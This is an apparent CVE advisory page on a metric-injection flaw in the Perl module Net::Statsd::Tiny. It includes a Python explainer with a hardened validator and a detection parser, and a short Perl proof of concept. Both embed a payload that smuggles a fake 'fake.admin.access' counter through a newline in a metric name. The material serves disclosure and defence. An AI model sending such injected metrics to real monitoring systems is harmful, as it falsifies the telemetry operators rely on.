Security Vulnerability Report
CVE-2026-46720 CVSS 8.2 HIGH

CVE-2026-46720

Published: 2026-05-17 18:16:27
Last Modified: 2026-05-18 17:40:45
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Net::Statsd::Tiny versions before 0.3.8 for Perl allowed metric injections. The metric names and set values were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics.
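The three characters the advisory names are exactly the structural separators of the statsd line protocol: a newline ends one metric, a colon ends the name, a pipe ends the value. The following Python is an added example written for this page; it is not code from the CVE record and not the Perl module's own implementation. It models the wire format to show how an unchecked name or set value turns one client call into two server-side metrics, and what a fixed formatter has to reject. The `NAME_RE` character class is an assumption about what counts as a legal metric name, and every sample name and value is constructed.

```python
# Added example (not code from the CVE record or from Net::Statsd::Tiny).
# Models the statsd line protocol to show why an unchecked metric name or
# set value lets one client call become several server-side metrics, and
# what the validation the advisory describes has to reject.  NAME_RE is an
# assumed whitelist; all sample names and values below are constructed.
import re

# Characters with structural meaning on the statsd wire: "\n" separates
# metrics, ":" separates name from value, "|" separates value from type and
# sample rate.  These are the three the advisory says were never checked.
STRUCTURAL = frozenset("\n\r:|")

# Assumed whitelist for metric names: dotted identifiers only.
# fullmatch() is used below on purpose: with re.match() and a trailing "$",
# a name ending in "\n" would still pass, because "$" matches before a
# final newline.
NAME_RE = re.compile(r"[A-Za-z0-9_.-]+")


def format_unchecked(name: str, value, mtype: str) -> str:
    """Pre-0.3.8 behaviour: name and value go straight onto the wire."""
    return f"{name}:{value}|{mtype}"


def is_safe_name(name: str) -> bool:
    """True if the name cannot alter the structure of the datagram."""
    return bool(name) and NAME_RE.fullmatch(name) is not None


def is_safe_set_value(value: str) -> bool:
    """Set values (type 's') are free-form strings, so they get the same check."""
    return bool(value) and not (STRUCTURAL & set(value))


def format_checked(name: str, value, mtype: str) -> str:
    """Hardened formatter: refuse any name or set value that could inject."""
    if not is_safe_name(name):
        raise ValueError(f"invalid statsd metric name: {name!r}")
    if mtype == "s" and not is_safe_set_value(str(value)):
        raise ValueError(f"invalid statsd set value: {value!r}")
    return f"{name}:{value}|{mtype}"


def parse_datagram(datagram: str) -> list[tuple[str, str, str]]:
    """Split a datagram the way a statsd server does: one metric per line,
    each 'name:value|type[|@rate]'.  Returns (name, value, type) triples so a
    log or packet-capture review can count what the server would record."""
    metrics = []
    for line in datagram.split("\n"):
        if not line.strip():
            continue
        name, _, rest = line.partition(":")
        value, _, type_and_rate = rest.partition("|")
        mtype = type_and_rate.partition("|")[0]
        metrics.append((name, value, mtype))
    return metrics


def metric_names(datagram: str) -> list[str]:
    """Names a server would record for this datagram."""
    return [name for name, _, _ in parse_datagram(datagram)]


if __name__ == "__main__":
    # Constructed untrusted input of the shape the advisory warns about:
    # a metric name carrying a newline, a colon and a pipe.
    tainted = "legit.requests\nfake.admin.access:1|c"
    wire = format_unchecked(tainted, 1, "c")
    print("unchecked formatter produced", len(parse_datagram(wire)),
          "metrics:", metric_names(wire))
    try:
        format_checked(tainted, 1, "c")
    except ValueError as exc:
        print("checked formatter rejected it:", exc)
```

Running the block shows the unchecked formatter yielding two metric names from a single call, while `format_checked` raises before anything reaches the socket. For detection, `parse_datagram` applied to captured UDP payloads gives a quick count of metrics per datagram from clients that are expected to send one; the set-value check matters because set metrics carry arbitrary strings, not numbers, which is why the advisory lists set values alongside metric names.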

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Net::Statsd::Tiny < 0.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl
#!/usr/bin/perl
use strict;
use warnings;

# This PoC demonstrates how untrusted input can inject metrics.
# It requires a vulnerable version of Net::Statsd::Tiny (< 0.3.8)

# Simulating the vulnerable library usage scenario
my $metric_name  = $ARGV[0] || 'legit.metric';
my $metric_value = 100;

# Malicious payload containing newline and pipe to inject a fake metric
# Payload structure: [Real Metric]\n[Fake Metric Name]:[Fake Value]|[Fake Type]
my $malicious_payload = "legit.requests\nfake.admin.access:1|c";

print "[+] Sending payload: $malicious_payload\n";

# In a vulnerable application, this might be passed directly to the statsd client:
# my $statsd = Net::Statsd::Tiny->new( host => '127.0.0.1', port => 8125 );
# $statsd->increment($malicious_payload);

print "[+] If the server parses this, it will record two metrics:\n";
print "    1. legit.requests (increment)\n";
print "    2. fake.admin.access:1 (counter)\n";

References

https://github.com/robrwo/Net-Statsd-Tiny/commit/06f814f52fbcc0b2afddf7a2d6f8137fd3cede13.patch
https://metacpan.org/release/RRWO/Net-Statsd-Tiny-v0.3.8/changes
https://www.cve.org/CVERecord?id=CVE-2026-46719

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-46720",
    "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
    "published": "2026-05-17T18:16:27.397",
    "lastModified": "2026-05-18T17:40:45.343",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Net::Statsd::Tiny versions before 0.3.8 for Perl allowed metric injections.\n\nThe metric names and set values were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-93"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/robrwo/Net-Statsd-Tiny/commit/06f814f52fbcc0b2afddf7a2d6f8137fd3cede13.patch",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "https://metacpan.org/release/RRWO/Net-Statsd-Tiny-v0.3.8/changes",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "https://www.cve.org/CVERecord?id=CVE-2026-46719",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      }
    ]
  }
}